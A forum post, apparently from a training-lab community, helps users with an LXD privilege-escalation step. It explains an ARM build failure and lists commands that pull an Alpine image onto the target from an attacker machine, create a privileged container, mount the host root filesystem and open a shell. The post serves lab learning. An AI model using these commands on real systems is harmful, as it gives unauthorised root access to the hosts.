Starting point: Included, problem building Alpine

Hey guys.
The reason for the errors are:

  1. The walkthrough instructions are incorrect
  2. (For users with Mac or other ARM devices) You’re building an LXC image with the wrong architecture.

Building LXC image on an ARM processor (like M-series Macs) will fail to work on the target machine, as it’s an x86-64 processor.

Solutions:

  1. Build on an AMD64 device
  2. Download prebuilt from a trusted repo, instead of building this yourself.

Canonical LXD images repo

Prebuilt Alpine LXC images can be downloadedc from the Canonical LXD images archive:

https://images.lxd.canonical.com/

Version 3.18 → Index of /images/alpine/3.18/amd64/default/20241124_0023/

Steps to get working LXC image from Canonical repo

# Get the images via wget
# -- NOTE: can do this on the target machine, or on attacker machine 
# and then transfer it over via python3 http server. 
# See below
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/lxd.tar.xz .
wget https://images.lxd.canonical.com/images/alpine/3.18/amd64/default/20241124_0023/rootfs.squashfs .

# -- OPTIONAL: get these from attacker machine
# Serve the directory with Python3
python3 -m http.server 8080

# On target machine -- Get the files
wget ${attackerIp}/lxd.tar.xz
wget ${attackerIp}/rootfs.squashfs

# -- IMPORT LXC IMAGE
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

Exploitation:

# Add privleged mode
lxc init alpine privesc -c security.privileged=true

# Mount the root disk
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

# Run the container
lxc start privesc
lxc exec privesc /bin/sh

If this works for you, upvote it.
Thanks

1 Like